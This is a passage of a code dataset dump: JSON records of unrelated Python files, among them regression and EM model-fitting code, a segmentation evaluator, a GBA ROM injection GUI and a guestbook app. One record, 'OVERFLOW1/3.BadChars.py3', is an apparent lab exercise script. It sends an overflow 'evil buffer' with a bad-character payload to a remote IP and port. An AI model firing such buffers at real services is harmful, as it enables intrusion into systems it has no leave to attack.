=list(X.values)\n    yTrain=list(Y.values)\n    del xTrain[splt_lower : splt_upper : 1]\n    del yTrain[splt_lower : splt_upper : 1]\n   # del xTrain[2:3]\n   # print(len(xTrain))\n    xTrain= numpy.array(xTrain)\n    yTrain= numpy.array(yTrain)    \n    # beta = (X'X)^-1 X'Y - Creating a training Model\n    beta = numpy.row_stack(numpy.dot(numpy.dot(numpy.linalg.inv(numpy.dot(xTrain.T,xTrain)),xTrain.T),yTrain))\n    print('Values calculated when considering section ',l+1,' as test data:\\n')\n    print('Beta for the test data:\\n',beta)\n\n    # Calculating Y = X. 
beta - Performing Classification\n\n yTest_pred =numpy.row_stack( numpy.dot(xTest,beta))\n \n '''print(yTest_pred)\n #print(numpy.round(yTest_pred))\n #print(len(yTest))\n #print(len(yTest_pred))'''\n \n yTest_pred = numpy.round(yTest_pred)\n print('Test Value :\\n',xTest)\n print('Predicted Value:\\n',yTest_pred)\n # print(xTrain)\n \n\n","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"216343809","text":"import numpy as np\nimport scipy.optimize as op\nimport time\nfrom functools import partial\nfrom copy import deepcopy\nfrom multiprocessing import Pool, cpu_count\nfrom . import RL_utils as ru\nfrom . import utility as ut\n\n# -------------------------------------------------------------------------------------\n# Fitting\n# -------------------------------------------------------------------------------------\n\ndef per_subject_fit(sessions, agent, max_change = 0.01, parallel = False):\n ''' Fit agent model seperately to sessions from each subject. Returns list\n of subject fits, each of which is a population_fit.\n '''\n subject_fits = []\n sIDs = sorted(set([s.subject_ID for s in sessions]))\n for sID in sIDs:\n subject_sessions = [s for s in sessions if s.subject_ID == sID]\n subject_fit = fit_population(subject_sessions, agent, max_change = 0.01, parallel = parallel)\n subject_fit['sID'] = sID\n subject_fits.append(subject_fit)\n return subject_fits\n\n\ndef longitudinal_fit(experiment, agent, epoch_len = 4, max_iter = 15):\n '''Perform population fitting longditudinally through an experiment doing \n population_fit on non-overlapping epochs each containing epoch_len days.'''\n epoch_start_days = list(range(1,experiment.n_days, epoch_len))\n epoch_fits = []\n for start_day in epoch_start_days:\n epoch_sessions = experiment.get_sessions('all',list(range(start_day,start_day + epoch_len)))\n population_fit = fit_population(epoch_sessions, agent, max_iter)\n population_fit['start_day'] = start_day\n epoch_fits.append(population_fit)\n return epoch_fits\n\n\ndef fit_population(sessions, agent, max_iter = 200, min_iter = 2, repeats = 5, pop_init_params = None,\n eval_BIC = False, verbose = False, max_change = 0.01, parallel = False):\n ''' Fits population level parameters using the Expectation Maximisation \n method from Huys et al. \n ''' \n\n start_time = time.time()\n\n # If agent selects subset of trials for fitting, exclude sessions for which agent \n # trial selection criterion does not select any trials. \n\n if hasattr(agent,'_select_trials') and bool(agent.trial_select):\n n_ses = len(sessions)\n sessions = [s for s in sessions if sum(agent._select_trials(s)) > 0]\n n_excluded = n_ses - len(sessions)\n else:\n n_excluded = 0\n \n #param_evol variable stores values of the population parameters as they evolve during the EM fitting.\n param_evol = {'means' : [], 'vars' : [], 'liks' : [],\n 'means_T' : [], 'upper_conf_T': [], 'lower_conf_T': [],\n 'means_U' : [], 'upper_conf_U': [], 'lower_conf_U': []} \n\n # Initialise prior for first round of MAP.\n if pop_init_params: \n print('Initial paramter estimate provided.')\n pop_means = pop_init_params['means']\n pop_vars = pop_init_params['SDs']**2\n else:\n pop_means = np.zeros(agent.n_params)\n pop_vars = np.ones(agent.n_params) * 6.25\n\n\n if parallel: # Set up parallel processing pool of workers. 
\n if parallel == True:\n p = Pool(cpu_count())\n else:\n p = Pool(parallel)\n\n if hasattr(agent,'_get_session_predictors'):\n # Precalculate predictors for logistic regression agents, note:\n # not currently using multiprocessing as can't pickle instancemethod.\n for session in sessions:\n session.predictors = agent._get_session_predictors(session)\n\n k = 1\n while k <= max_iter:\n\n # E - Step: Evaluate the new posterior distribution of the subject \n # parameters used to calculate expectation of log likelihood.\n\n print(('\\nMaximum a posteriori fitting... Round: ' + str(k)), end=' ')\n\n MAP_fit_func = partial(fit_session, agent = agent , pop_means = pop_means,\n pop_vars = pop_vars, repeats = repeats, verbose = verbose)\n\n if parallel:\n MAP_fits = p.map(MAP_fit_func, sessions)\n else:\n MAP_fits = list(map(MAP_fit_func, sessions))\n\n for session, fit in zip(sessions, MAP_fits):\n session.init_params_U = fit['params_U'] # Store session fits as inital parameters for next round of fitting.\n\n\n pop_likelihood = np.sum(np.array([fit['likelihood'] for fit in MAP_fits]))\n sub_params_U = np.array([fit['params_U'] for fit in MAP_fits]) \n sub_diag_hess = np.array([fit['diag_hess'] for fit in MAP_fits])\n\n sub_diag_hess[sub_diag_hess > -1e-15] = -1e-15 # Set any hessians that are 0 to small negative \n # value to prevent divide by zero error.\n\n # M - step: Adjust population distribution mean and variance to \n # maximise the expectation of the log likelihood.\n\n pop_means = np.mean(sub_params_U, 0)\n pop_vars = np.mean(sub_params_U ** 2 + 1. / -sub_diag_hess, 0) - pop_means ** 2.\n \n if verbose: # Print info about hessians as sanity check.\n max_index = np.unravel_index(np.argmax(sub_diag_hess),np.shape(sub_diag_hess))\n print(('Maximum sub_diag_hess: {:.4} , at session: {}, param: {}, param value U: {:.4}'\n .format(np.max(sub_diag_hess), max_index[0], max_index[1], sub_params_U[max_index])))\n\n # Store information about population parameter evolution.\n\n param_evol['means'].append(pop_means)\n param_evol['vars'].append(pop_vars)\n param_evol['liks'].append(pop_likelihood)\n\n err_bar_2_SD = 2. * np.sqrt(pop_vars) \n param_evol['means_T'].append(ru.trans_UT(pop_means, agent.param_ranges)) \n param_evol['upper_conf_T'].append(ru.trans_UT(pop_means + err_bar_2_SD, agent.param_ranges))\n param_evol['lower_conf_T'].append(ru.trans_UT(pop_means - err_bar_2_SD, agent.param_ranges))\n\n #Test for convergence: Evaluate maximum change in mean and 95% confidence intervals in true space. 
\n if k >= min_iter: \n max_param_change = np.max(np.abs([param_evol['means_T'][-1 ] - param_evol['means_T'][-2],\n param_evol['upper_conf_T'][-1] - param_evol['upper_conf_T'][-2],\n param_evol['lower_conf_T'][-1] - param_evol['lower_conf_T'][-2]]))\n print(('Max change T: {:.4}'.format(max_param_change)), end=' ')\n if max_param_change < max_change:\n print ('\\nEM fitting Converged.')\n break\n\n k += 1\n repeats = 1 # Only use multiple initial values for gradient descent on first round, then initialise with previous values.\n\n print(('Elapsed time: ' + str(time.time() - start_time)))\n\n if parallel:p.close()\n\n for session, MAP_fit in zip(sessions, MAP_fits):\n del session.init_params_U # Remove fitting initial params from sessions.\n if hasattr(session, 'subject_ID'):\n MAP_fit['sID'] = session.subject_ID # Record animal ID on MAP fits.\n\n pop_params = {'means' : pop_means, 'SDs' : np.sqrt(pop_vars), 'ranges': agent.param_ranges}\n if hasattr(agent,'param_names'): pop_params['names'] = agent.param_names\n\n population_fit = {'MAP_fits' : MAP_fits,\n 'pop_params' : pop_params,\n 'param_evol' : param_evol,\n 'agent_name' : agent.name,\n 'param_names' : agent.param_names,\n 'n_trials' :[s.n_trials for s in sessions]}\n\n if hasattr(sessions[0], 'true_params_T'):\n # If simulated data, store true values of parameters in population_fit\n population_fit['true_values'] = {'params_U' : [session.true_params_U for session in sessions],\n 'params_T' : [session.true_params_T for session in sessions]} \n population_fit['pop_params_true'] = sessions[0].pop_params_true\n population_fit['param_names_true'] = sessions[0].param_names\n \n if eval_BIC: \n if eval_BIC == True: eval_BIC = 100 # Default to 100 draws if True passed in as eval_BIC argument.\n print(('Evaluating integrated BIC score, n_draws: {}'.format(eval_BIC)))\n BIC_score, integrated_likelihood, choice_prob = evaluate_BIC(sessions, agent, pop_params, eval_BIC, parallel)\n population_fit['BIC_score'] = BIC_score\n population_fit['choice_prob'] = choice_prob\n population_fit['integrated_likelihood'] = integrated_likelihood\n population_fit['MAP_likelihood'] = evaluate_MAP_fit_likelihood(population_fit,sessions,agent)\n\n if hasattr(sessions[0],'predictors'):\n for session in sessions:\n del session.predictors\n\n if n_excluded > 0:\n print(('{} of {} sessions excluded by agent trial selection criterion.'.format(n_excluded, n_ses)))\n\n return population_fit\n\ndef fit_session(session, agent, pop_means = None, pop_vars = None, repeats = 3, verbose = False):\n '''Find maximum a posteriori parameter values for agent for given session and means and variances of \n population level prior distributions. '''\n\n if pop_means is None: # No prior passed in, use (almost completely) uninformative prior.\n pop_means = np.zeros(agent.n_params)\n pop_vars = np.ones(agent.n_params) * 100.\n\n use_init_params = hasattr(session, 'init_params_U')\n\n fit_func = lambda params_U: session_log_posterior(params_U, session, agent, pop_means, pop_vars, sign = - 1.)\n\n good_fit_found = False\n while not good_fit_found: # Check based on positive values of hessian.\n\n fits = []\n for i in range(repeats): # Perform fitting. 
\n if use_init_params:\n init_params_U = session.init_params_U\n else:\n init_params_U = ru.random_params(agent.param_ranges)\n \n fits.append(op.minimize(fit_func, init_params_U, jac = agent.calculates_gradient,\n options = {'disp': verbose, 'gtol': 1e-7})) \n use_init_params = False # Only use provided initial parameters for first repeat.\n\n fit = fits[np.argmin([f['fun'] for f in fits])] # Select best fit out of repeats.\n hess_func = lambda params_U: session_log_posterior(params_U, session, agent, pop_means, pop_vars, sign = 1., eval_grad = False)\n\n hessdiag = ru.Hess_diag(hess_func, fit['x'], 1e-4)\n\n if np.max(hessdiag) > 0.:\n print('Bad fit. Repeating.')\n else:\n good_fit_found = True\n\n session_fit = {'params_U' : fit['x'],\n 'params_T' : ru.trans_UT(fit['x'], agent.param_ranges),\n 'likelihood' : - fit['fun'], \n 'diag_hess' : hessdiag} \n\n return session_fit\n\ndef session_log_posterior(params_U, session, agent, pop_means, pop_vars, eval_grad = True, sign = 1.):\n '''Evaluates the log posterior probability of behaviour in a single session \n for a given set of parameter values and population level mean and variances.\n '''\n\n params_T = ru.trans_UT(params_U, agent.param_ranges)\n\n log_prior_prob = - (len(params_U) / 2.) * np.log(2 * np.pi) - np.sum(np.log(pop_vars)) / 2. \\\n - sum((params_U - pop_means) ** 2. / (2 * pop_vars))\n\n if agent.calculates_gradient and eval_grad:\n log_likelihood, log_likelihood_gradient_T = agent.session_likelihood(session, params_T, eval_grad = True)\n\n log_likelihood_gradient_U = ru.trans_grad_TU(params_T, log_likelihood_gradient_T, agent.param_ranges)\n\n log_prior_prob_gradient = ((pop_means - params_U) / pop_vars)\n\n log_posterior_prob = log_likelihood + log_prior_prob\n log_posterior_grad = log_likelihood_gradient_U + log_prior_prob_gradient\n\n return (sign * log_posterior_prob, sign * log_posterior_grad)\n\n else:\n\n log_likelihood = agent.session_likelihood(session, params_T)\n\n log_posterior_prob = log_likelihood + log_prior_prob\n\n return (sign * log_posterior_prob)\n\ndef evaluate_MAP_fit_likelihood(population_fit, sessions, agent):\n data_log_likelihood = 0 \n for MAP_fit, session in zip(population_fit['MAP_fits'],sessions):\n data_log_likelihood += agent.session_likelihood(session, MAP_fit['params_T'])\n return data_log_likelihood\n\n\ndef evaluate_BIC(sessions, agent, pop_params, n_draws = 100, parallel = True):\n '''Return the integrated BIC score for given agent model, sessions\n & agent population parameter distribution.'''\n\n if 'pop_params' in list(pop_params.keys()): # allow population fit to be passed in instead of pop_params\n pop_params = pop_params['pop_params']\n\n int_func = partial(_session_integrated_log_likelihood, agent = agent, pop_params = pop_params, n_draws = n_draws)\n\n if parallel:\n p = Pool(cpu_count())\n integrated_likelihood = np.sum(p.map(int_func, sessions))\n p.close()\n else:\n integrated_likelihood = np.sum(list(map(int_func, sessions)))\n \n n_params = 2 * agent.n_params # Factor of 2 as each agent param has mean and variance as population params.\n if hasattr(agent,'_select_trials') and bool(agent.trial_select):\n n_trials = sum([sum(agent._select_trials(s)) for s in sessions])\n else:\n n_trials = sum([s.n_trials for s in sessions])\n\n BIC_score = - 2. 
* integrated_likelihood + n_params * np.log(n_trials)\n\n    choice_prob = np.exp(integrated_likelihood/n_trials)\n    return (BIC_score, integrated_likelihood, choice_prob)\n\ndef _session_integrated_log_likelihood(session, agent, pop_params, n_draws):\n    '''Estimate integrated log likelihood for one session by importance sampling.'''\n    log_likelihood_samples = np.zeros(n_draws)\n    for i in range(n_draws):\n        sample_params_T = ru.sample_params_T_from_pop_params(pop_params, agent)\n        log_likelihood_samples[i] = agent.session_likelihood(session, sample_params_T)\n    # Subtract maximum log likelihood sample from each sample before taking exponent to\n    # protect against exponent returning zero for large negative log likelihoods.\n    max_log_lik_sample = max(log_likelihood_samples) \n    session_int_log_lik = max_log_lik_sample + \\\n                          np.log(np.sum(np.exp(log_likelihood_samples - \\\n                                               max_log_lik_sample))/n_draws)\n    return session_int_log_lik\n\n\ndef grad_check(session, agent, params_T = [], verbose = True):\n    'Check analytical likelihood gradient returned by agent.'\n    if len(params_T) == 0:\n        params_T = ru.random_params(agent.param_ranges, return_T = True)\n    fit_func = lambda params_T: agent.session_likelihood(session, params_T, eval_grad = True)\n    lik_func = lambda params_T: fit_func(params_T)[0]\n    grad_func = lambda params_T: fit_func(params_T)[1]\n    l2error = op.check_grad(lik_func, grad_func, params_T)\n    if verbose:\n        print(('Error between finite difference and analytic derivatives = ' + str(l2error)))\n        if l2error > 1e-3:\n            print(('Params_T: {}'.format(agent.get_params_T())))\n    else:\n        return(l2error, params_T) # return the tested parameters (params_U was undefined here)\n\n","sub_path":"pedro/code/Two_step_bak/model_fitting.py","file_name":"model_fitting.py","file_ext":"py","file_size_in_byte":15190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"130466831","text":"'''\nTask: Deleting a fragment\nCondition\nGiven a string in which the letter h occurs at least twice. 
Delete from this string the first and the last occurrence of the letter h, together with all the characters between them.\n'''\ns = input()\n# s = '123h56h7'\ns1 = s[:]\nind1 = s1.find('h')\n# ind2 = s1[ind1 + 1:].find('h') + ind1 # overcomplicated it\nind2 = s1.rfind('h')\nprint(s[:ind1] + s[ind2 + 1:])\n","sub_path":"001703StepPyStudy/Step001703PyStudyсh05_strings_TASK07_20210222_delChunk.py","file_name":"Step001703PyStudyсh05_strings_TASK07_20210222_delChunk.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"372778661","text":"import socket\n\nip = \"10.10.46.154\"\nport = 1337\n\nprefix = b\"OVERFLOW1 \"\noffset = 1978\noverflow = b\"A\" * offset\nretn = b\"BBBB\"\npadding = b\"\"\n\nbad_chars = [0]\npayload = b''.join([bytes([i]) for i in range(0,256) if i not in bad_chars])\npostfix = b\"\"\n\nbuffer = prefix + overflow + retn + padding + payload + postfix\n# print(buffer)\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n    s.connect((ip, port))\n    print(\"Sending evil buffer...\")\n    s.send(buffer + b\"\\r\\n\")\n    print(\"Done!\")\nexcept Exception as e:\n    print(e)\n    print(\"Could not connect.\")\n","sub_path":"OVERFLOW1/3.BadChars.py3","file_name":"3.BadChars.py3","file_ext":"py3","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"248635506","text":"class TrendUp:\n    def __init__(self, df, params):\n        self.df = df\n        self.H = self.df[\"high\"]\n        self.L = self.df[\"low\"]\n        self.numPeriods = params[\"numPeriods\"] if \"numPeriods\" in params.keys() else 3\n        self.coef = params[\"coef\"] if \"coef\" in params.keys() else 1\n        self.attrName = params[\"attrName\"] if \"attrName\" in params.keys() else \"trendUp\"\n\n    def run(self):\n        trendList = [False for _ in range(len(self.df))]\n        for i in range(self.numPeriods, len(self.df)):\n            isTrendHigh = False not in [\n                True if self.coef * self.H.iloc[j] > self.H.iloc[j - 1] else False\n                for j in range(i - self.numPeriods, i)\n            ]\n            isTrendLow = False not in [\n                True if self.coef * self.L.iloc[j] > self.L.iloc[j - 1] else False\n                for j in range(i - self.numPeriods, i)\n            ]\n            trendList[i] = isTrendHigh and isTrendLow\n        return [(self.attrName, trendList)]\n","sub_path":"Backtest/main/Attributes/lib/TrendUp.py","file_name":"TrendUp.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"426644798","text":"def divide(a,b):\r\n    return a/b\r\n\r\ntry:\r\n    c=divide(5, 0)\r\nexcept ZeroDivisionError:\r\n    print(\"두번째 인자는 0이어서는 안 됩니다.\")\r\nexcept TypeError:\r\n    print(\"모든 인자는 숫자여야 합니다.\")\r\nexcept:\r\n    print(\"음~ 무슨 에러인지 모르겠어요!\")\r\n\r\n","sub_path":"python6/예외처리2.py","file_name":"예외처리2.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"49474500","text":"from threading import Thread\nimport time\n\n\n# num = 1\ng_num = [11, 22, 33]\n\n\ndef worker_1(num):\n    # global num\n    # for i in range(3):\n    #     num += 1\n    num.append(44)\n    print('worker_1 num: ', num)\n\n\ndef worker_2(num):\n    # global num\n    print('worker_2 num: ', num)\n\n\nprint('---start num=%s-------' % g_num)\nt1 = Thread(target=worker_1, args=(g_num, ))\nt1.start()\n\ntime.sleep(2)\n\nt2 = Thread(target=worker_2, args=(g_num, 
))\nt2.start()","sub_path":"07_older/18_global.py","file_name":"18_global.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"426400681","text":"import os\nimport glob\nimport argparse\n\nfrom tqdm import tqdm\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom models import Deeplabv3Resnet50, Deeplabv3Resnet101\nfrom utils.dataset import SegmentationDataset\n\nfrom utils.losses import DiceLoss\nfrom utils.metrics import IoU, Accuracy, Precision, Recall, Fscore\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-pt', '--pt', type=str, required=True)\n parser.add_argument('-vip', '--val_image_path', type=str, required=True)\n parser.add_argument('-vlp', '--val_label_path', type=str, required=True)\n parser.add_argument('-cls', '--classes', type=str, required=True)\n\n parser.add_argument('--no-cuda', action='store_true')\n parser.add_argument('-s', '--size', type=int, default=300)\n\n parser.add_argument('--backbone', type=str, default='resnet50', choices=['resnet50', 'resnet101'])\n parser.add_argument('--num-workers', type=int, default=4)\n\n args = parser.parse_args()\n print(args)\n\n device = 'cuda' if (torch.cuda.is_available() and not (args.no_cuda)) else 'cpu'\n print(f'Device : {device}')\n\n classes = open(args.classes, 'r').read().splitlines()\n\n val_images = glob.glob(os.path.normpath(args.val_image_path) + '/*.jpg')\n val_masks = glob.glob(os.path.normpath(args.val_label_path) + '/*.png')\n val_images.sort()\n val_masks.sort()\n\n if args.backbone == 'resnet50':\n model = Deeplabv3Resnet50(len(classes)).to(device)\n else:\n model = Deeplabv3Resnet101(len(classes)).to(device)\n\n model.load_state_dict(torch.load(args.pt))\n model = model.eval()\n\n dice_loss = DiceLoss()\n\n iou_metric = IoU()\n accuracy_metric = Accuracy()\n precision_metric = Precision()\n recall_metric = Recall()\n f_score_metric = Fscore()\n\n val_dataset = SegmentationDataset(val_images, val_masks, classes, args.size, False)\n val_dataloader = DataLoader(val_dataset, batch_size=1, shuffle=False, num_workers=args.num_workers)\n\n sum_losses = 0\n sum_iou_metric = 0\n sum_accuracy_metric = 0\n sum_precision_metric = 0\n sum_recall_metric = 0\n sum_f_score_metric = 0\n\n desc = f'Eval'\n for images, masks in tqdm(val_dataloader, desc=desc):\n with torch.no_grad():\n images = images.to(device)\n masks = masks.to(device)\n\n with torch.cuda.amp.autocast():\n results = model(images)\n\n sum_losses += dice_loss(results, masks)\n sum_iou_metric += iou_metric(results, masks).item()\n sum_accuracy_metric += accuracy_metric(results, masks).item()\n sum_precision_metric += precision_metric(results, masks).item()\n sum_recall_metric += recall_metric(results, masks).item()\n sum_f_score_metric += f_score_metric(results, masks).item()\n\n sum_losses /= len(val_dataloader)\n sum_iou_metric /= len(val_dataloader)\n sum_accuracy_metric /= len(val_dataloader)\n sum_precision_metric /= len(val_dataloader)\n sum_recall_metric /= len(val_dataloader)\n sum_f_score_metric /= len(val_dataloader)\n\n print(f'Final results')\n print(f'Loss: {round(sum_losses, 5)}')\n print(f'IoU: {round(sum_iou_metric, 3)}')\n print(f'Accuracy: {round(sum_accuracy_metric, 3)}')\n print(f'Precision: {round(sum_precision_metric, 3)}')\n print(f'Recall: {round(sum_recall_metric, 3)}')\n print(f'F score: {round(sum_f_score_metric, 
3)}')\n","sub_path":"eval_deeplabv3_resnet50.py","file_name":"eval_deeplabv3_resnet50.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"20007199","text":"#!/usr/bin/env python3\nimport\tos\nimport\tsys\nsys.path.append(os.path.join(os.path.dirname(__file__), 'easygui-0.98.0-py3.5.egg'))\nimport\teasygui as eg\n\nimport\tinject_gba_cli as myapp\n\napp_name = 'GBA injection wizard'\napp_title = app_name\n\nchoose_task_text ='''This tool provides a simplified interface to:\n\n* Decrypt, decompress, and unpack an alldata.psb.m/alldata.bin file,\n\n* Extract or replace the ROM file\n\n* Repack, compress, and encrypt a new alldata.psb.m/alldata.bin file.\n\n\nWhat do you want to do?'''\nchoose_task_choices = [\n\t'Extract ROM',\n\t'Inject ROM',\n\t'Quit',\n\t]\n\ninject_choose_inrom_text = '''Choose your input ROM'''\ninject_choose_inpsb_text = '''Choose your input alldata.psb.m'''\ninject_choose_outpsb_text = '''Choose your output alldata.psb.m'''\ninject_confirm_text = '''\nInject a ROM into a .psb.m file\n\nWe are about to inject this rom:\n{rom}\n\ninto this psb:\n{inpsb}\n\nand save the result as:\n{outpsb}\n\n'''\n\nextract_choose_inpsb_text = '''Choose your input alldata.psb.m'''\nextract_choose_outrom_text = '''Choose your output ROM'''\nextract_confirm_text = '''\nExtract the ROM from a .psb.m file\n\nWe are about to extract the ROM from this psb:\n{inpsb}\n\nand save the ROM as:\n{outrom}\n\n'''\n\n\nstate = 'choose_task'\nwhile state:\n\tif state == 'choose_task':\n\t\tapp_title = app_name + ' - Choose Task'\n\t\trv = eg.buttonbox(choose_task_text, app_title, choose_task_choices)\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\texit(0)\n\t\tif rv == choose_task_choices[0]:\n\t\t\tstate = 'extract'\n\t\telif rv == choose_task_choices[1]:\n\t\t\tstate = 'inject'\n\t\telif rv == choose_task_choices[2]:\n\t\t\tstate = 'quit'\n\t\t\texit(0)\n\telif state == 'extract':\n\t\t# Hidden state to clear our filenames\n\t\tapp_title = 'Extract ROM'\n\t\tinpsb = ''\n\t\toutrom = ''\n\t\tstate = 'extract_choose_inpsb'\n\telif state == 'extract_choose_inpsb':\n\t\trv = eg.fileopenbox(extract_choose_inpsb_text, app_title, filetypes=['*', ['*.psb.m', 'psb.m files']])\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\tinpsb = rv\n\t\t\tstate = 'extract_choose_outrom'\n\telif state == 'extract_choose_outrom':\n\t\trv = eg.filesavebox(extract_choose_outrom_text, title=app_title, default='gba.rom', filetypes=['*.rom', '*.gba'])\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\toutrom = rv\n\t\t\tstate = 'extract_confirm'\n\telif state == 'extract_confirm':\n\t\trv = eg.ccbox(extract_confirm_text.format(inpsb=inpsb, outrom=outrom), app_title)\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\tmypsb = myapp.load_from_psb(inpsb)\n\t\t\tmyapp.write_rom(mypsb, outrom)\n\t\t\tstate = 'choose_task'\n\telif state == 'inject':\n\t\t# Hidden state to clear our filenames\n\t\tapp_title = 'Inject ROM'\n\t\tinrom = ''\n\t\tinpsb = ''\n\t\toutpsb = ''\n\t\tstate = 'inject_choose_rom'\n\telif state == 'inject_choose_rom':\n\t\trv = eg.fileopenbox(inject_choose_inrom_text, app_title, filetypes=['*.rom', '*.gba'])\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\tinrom = rv\n\t\t\tstate = 'inject_choose_inpsb'\n\telif 
state == 'inject_choose_inpsb':\n\t\trv = eg.fileopenbox(inject_choose_inpsb_text, app_title, filetypes=[['*.psb.m', 'psb.m files']])\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\tinpsb = rv\n\t\t\tstate = 'inject_choose_outpsb'\n\telif state == 'inject_choose_outpsb':\n\t\trv = eg.filesavebox(inject_choose_outpsb_text, title=app_title, default='alldata.psb.m', filetypes=[['*.psb.m', 'psb.m files']])\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\toutpsb = rv\n\t\t\tstate = 'inject_confirm'\n\telif state == 'inject_confirm':\n\t\trv = eg.ccbox(inject_confirm_text.format(rom=inrom, inpsb=inpsb, outpsb=outpsb), app_title)\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\tmypsb = myapp.load_from_psb(inpsb)\n\t\t\tmyapp.read_rom(mypsb, inrom)\n\t\t\tmyapp.write_psb(mypsb, outpsb)\n\t\t\tmyapp.write_bin(mypsb, outpsb)\n\t\t\tstate = 'choose_task'\n\telse:\n\t\tprint(\"Unknown state '%s'\" % state)\n\t\texit(1)\n","sub_path":"inject_gba_gui.py","file_name":"inject_gba_gui.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"59191915","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 3 17:05:43 2018\n\n@author: Jason\n\"\"\"\n\ndef removeChars(arr, string):\n \n hashTable ={}\n \n # for each character in the array, assign true to the value with c as the key\n for c in arr:\n hashTable[c] = True\n \n result = ''\n \n # for c in the string, if c is not in the hash table the append to result\n for c in string:\n if c not in hashTable:\n result += c\n \n return result\n\ntchars = ['h', 'e', 'w', 'o'];\ntstring = 'hello world';","sub_path":"removeChars.py","file_name":"removeChars.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"232650571","text":"#!/usr/bin/env python\nfrom datetime import datetime\nimport os\nimport jinja2\nimport webapp2\nfrom models import Guest\nfrom google.appengine.api import users\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), \"templates\")\njinja_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir), autoescape=False)\n\n\nclass BaseHandler(webapp2.RequestHandler):\n\n def write(self, *a, **kw):\n return self.response.out.write(*a, **kw)\n\n def render_str(self, template, **params):\n t = jinja_env.get_template(template)\n return t.render(params)\n\n def render(self, template, **kw):\n return self.write(self.render_str(template, **kw))\n\n def render_template(self, view_filename, params=None):\n if not params:\n params = {}\n template = jinja_env.get_template(view_filename)\n return self.response.out.write(template.render(params))\n\n\nclass MainHandler(BaseHandler):\n def get(self):\n user = users.get_current_user()\n\n if user:\n logiran = True\n logout_url = users.create_logout_url('/')\n params = {\"logiran\": logiran, \"logout_url\": logout_url, \"user\": user}\n else:\n logiran = False\n login_url = users.create_login_url('/')\n\n params = {\"logiran\":logiran, \"login_url\": login_url, \"user\": user}\n\n return self.render_template(\"hello.html\", params=params)\n\n\nclass VnosHandler(BaseHandler):\n def post(self):\n ime_priimek = self.request.get(\"ImePriimek\")\n if ime_priimek == \"\":\n ime_priimek = \"neznanec\"\n e_posta = self.request.get(\"E_mail\")\n message_ = 
self.request.get(\"Message\")\n\n guest = Guest(ImePriimek = ime_priimek, E_mail = e_posta, Message = message_)\n guest.put()\n\n self.write(\"Hvala za sporocilo. Vas kontaktiramo v kratkem!\")\n self.redirect_to(\"seznam-gostov\")\n\nclass SeznamGostovHandler(BaseHandler):\n def get(self):\n seznam = Guest.query(Guest.izbrisan == False).fetch()\n params = {\"seznam\": seznam}\n self.render_template(\"seznam_gostov.html\", params=params)\n\n\nclass PosamezniGostHandler(BaseHandler):\n def get(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n params = {\"guest\": guest}\n self.render_template(\"posamezni_gost.html\", params=params)\n\nclass UrediMessageHandler(BaseHandler):\n def get(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n params = {\"guest\": guest}\n self.render_template(\"uredi_message.html\", params=params)\n\n def post(self, guest_ID):\n Message = self.request.get(\"Message\")\n guest = Guest.get_by_id(int(guest_ID))\n guest.Message = Message\n guest.put()\n self.redirect_to(\"seznam-gostov\")\n\nclass IzbrisiMessageHandler(BaseHandler):\n def get(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n params = {\"guest\": guest}\n self.render_template(\"izbrisi_message.html\", params=params)\n\n def post(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n guest.izbrisan = True\n guest.put()\n self.redirect_to(\"seznam-gostov\")\n\nclass IzbrisaniHandler(BaseHandler):\n def get(self):\n seznam = Guest.query(Guest.izbrisan == True).fetch()\n params = {\"seznam\": seznam}\n self.render_template(\"izbrisani.html\", params=params)\n\nclass ObnoviHandler(BaseHandler):\n def get(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n guest.izbrisan = False\n guest.put()\n self.redirect_to(\"seznam-gostov\")\n\nclass 